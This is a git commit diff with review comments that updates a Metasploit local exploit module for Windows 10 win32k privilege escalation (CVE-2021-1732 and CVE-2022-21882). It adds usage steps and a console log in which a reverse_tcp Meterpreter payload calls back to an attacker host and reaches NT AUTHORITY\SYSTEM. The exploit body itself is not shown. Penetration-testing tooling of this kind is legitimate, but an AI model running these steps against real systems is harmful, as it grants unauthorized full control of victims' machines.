Writeup the module metadata and docs
parent
d92259f868
commit
bcd7cb1122
|
@ -0,0 +1,86 @@
|
|||
## Vulnerable Application
|
||||
A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of
|
||||
NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being
|
||||
treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to
|
||||
achieve an out of bounds write operation, eventually leading to privilege escalation.
|
||||
|
||||
This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.
|
||||
In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is
|
||||
is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to
|
||||
function on a wider range of Windows 10 targets.
|
||||
|
||||
Windows 10 builds 17134 (v1803) through 19041 (v20H1) will use the original technique from CVE-2021-1732, leveraging
|
||||
`user32!CreateWindowEx` to trigger the `xxxClientAllocWindowClassExtraBytes` hook and corrupt the target window. Windows
|
||||
10 builds 19042 (v20H2) through 19044 (v21H2) will use the updated technique from CVE-2022-21882, leveraging
|
||||
`win32u!NtUserMessageCall` to trigger the `xxxClientAllocWindowClassExtraBytes` hook for the same effect.
|
||||
|
||||
### Installation And Setup
|
||||
Windows 10 versions 1803 through 21H2 (without the patch) are vulnerable out of the box. This exploit module has been
|
||||
tested on Windows 10 versions 1803, 1909, 20H1, 20H2 and 21H2.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
1. Get a Meterpreter session on a vulnerable host
|
||||
1. Do: `use exploit/windows/local/cve_2022_21882_win32k`
|
||||
1. Set the `SESSION` and `PAYLOAD` options
|
||||
1. Do: `run`
|
||||
1. You should get a shell.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Windows 10 Version 21H2 Build 19044.1288 x64
|
||||
|
||||
```
|
||||
msf6 exploit(windows/local/cve_2022_21882_win32k) > sessions -i -1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: DESKTOP-SRAQBLH\smcintyre
|
||||
meterpreter > sysinfo
|
||||
Computer : DESKTOP-SRAQBLH
|
||||
OS : Windows 10 (10.0 Build 19044).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x64/windows
|
||||
meterpreter > getsystem
|
||||
[-] stdapi_sys_config_getuid: Operation failed: 1346 The following was attempted:
|
||||
[-] Named Pipe Impersonation (In Memory/Admin)
|
||||
[-] Named Pipe Impersonation (Dropper/Admin)
|
||||
[-] Token Duplication (In Memory/Admin)
|
||||
[-] Named Pipe Impersonation (RPCSS variant)
|
||||
[-] Named Pipe Impersonation (PrintSpooler variant)
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
msf6 exploit(windows/local/cve_2022_21882_win32k) > set SESSION -1
|
||||
SESSION => -1
|
||||
msf6 exploit(windows/local/cve_2022_21882_win32k) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
||||
PAYLOAD => windows/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(windows/local/cve_2022_21882_win32k) > set LHOST 192.168.159.128
|
||||
LHOST => 192.168.159.128
|
||||
msf6 exploit(windows/local/cve_2022_21882_win32k) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.159.128:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Launching netsh to host the DLL...
|
||||
[+] Process 6840 launched.
|
||||
[*] Reflectively injecting the DLL into 6840...
|
||||
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
|
||||
[*] Sending stage (200262 bytes) to 192.168.159.87
|
||||
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.87:52622 ) at 2022-02-18 14:34:00 -0500
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > sysinfo
|
||||
Computer : DESKTOP-SRAQBLH
|
||||
OS : Windows 10 (10.0 Build 19044).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x64/windows
|
||||
meterpreter >
|
||||
```
|
|
@ -12,18 +12,39 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
|
||||
include Msf::Exploit::Deprecated
|
||||
moved_from 'exploit/windows/local/cve_2021_1732_win32k'
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
{
|
||||
'Name' => '',
|
||||
'Name' => 'Win32k ConsoleControl Offset Confusion',
|
||||
'Description' => %q{
|
||||
A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of
|
||||
NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being
|
||||
treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to
|
||||
achieve an out of bounds write operation, eventually leading to privilege escalation.
|
||||
|
||||
This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.
|
||||
In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is
|
||||
is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to
|
||||
function on a wider range of Windows 10 targets.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
# CVE-2021-1732
|
||||
'BITTER APT', # exploit as used in the wild
|
||||
'JinQuan', # detailed analysis
|
||||
'MaDongZe', # detailed analysis
|
||||
'TuXiaoYi', # detailed analysis
|
||||
'LiHao', # detailed analysis
|
||||
# CVE-2022-21882
|
||||
'L4ys', # github poc
|
||||
'KaLendsi', # github poc
|
||||
# both CVEs
|
||||
'KaLendsi', # github pocs
|
||||
# Metasploit exploit
|
||||
'Spencer McIntyre' # metasploit module
|
||||
],
|
||||
'Arch' => [ ARCH_X64 ],
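Review bot: The new Description text doubles a word across the line break: `...and assigned CVE-2022-21882. The root cause is` is followed by `is the same for both vulnerabilities.`; drop the leading `is` on the second line so it reads `the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to`. The same doubled "is" appears in the markdown documentation file added in the first hunk, which otherwise duplicates this paragraph verbatim. The rendering does not make the old/new side of every Author line certain, but if both `'KaLendsi', # github poc` and `'KaLendsi', # github pocs` survive on the new side, that author is listed twice and the CVE-2022-21882 entry should go. The `initialize` method begins in this hunk and continues past its end.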
|
||||
|
@ -33,26 +54,34 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
'EXITFUNC' => 'thread'
|
||||
},
|
||||
'Targets' => [
|
||||
[ 'Windows 10 v20H2-21H2 x64', { 'Arch' => ARCH_X64 } ]
|
||||
[ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]
|
||||
],
|
||||
'Payload' => {
|
||||
'DisableNops' => true
|
||||
},
|
||||
'References' => [
|
||||
# CVE-2021-1732 references
|
||||
[ 'CVE', '2021-1732' ],
|
||||
[ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],
|
||||
[ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],
|
||||
[ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],
|
||||
[ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],
|
||||
# the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit
|
||||
[ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],
|
||||
[ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],
|
||||
[ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],
|
||||
[ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],
|
||||
# CVE-2022-21882 references
|
||||
[ 'CVE', '2022-21882' ],
|
||||
[ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],
|
||||
[ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]
|
||||
],
|
||||
'DisclosureDate' => '',
|
||||
'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date
|
||||
'DefaultTarget' => 0,
|
||||
'Notes' => {
|
||||
'Stability' => [ CRASH_OS_RESTARTS, ],
|
||||
'Reliability' => [ REPEATABLE_SESSION, ],
|
||||
'SideEffects' => [],
|
||||
'RelatedModules' => [
|
||||
# this module exploits the original vulnerability for which this is a patch bypass
|
||||
'exploit/windows/local/cve_2021_1732_win32k'
|
||||
]
|
||||
'SideEffects' => []
|
||||
}
|
||||
}
|
||||
)
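Review bot: `'RelatedModules'` names `exploit/windows/local/cve_2021_1732_win32k`, which is the same path the previous hunk registers with `moved_from` under `Msf::Exploit::Deprecated`; if that registration means the old module is retired in favour of this one, the RelatedModules entry points back at this module and the comment `# this module exploits the original vulnerability for which this is a patch bypass` is stale. Either remove the entry, or, if the CVE-2021-1732 module still ships separately, the `moved_from` declaration is the one that should go, since the two statements cannot both hold. The `initialize` call enclosing these lines begins before this hunk.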
|
||||
|
|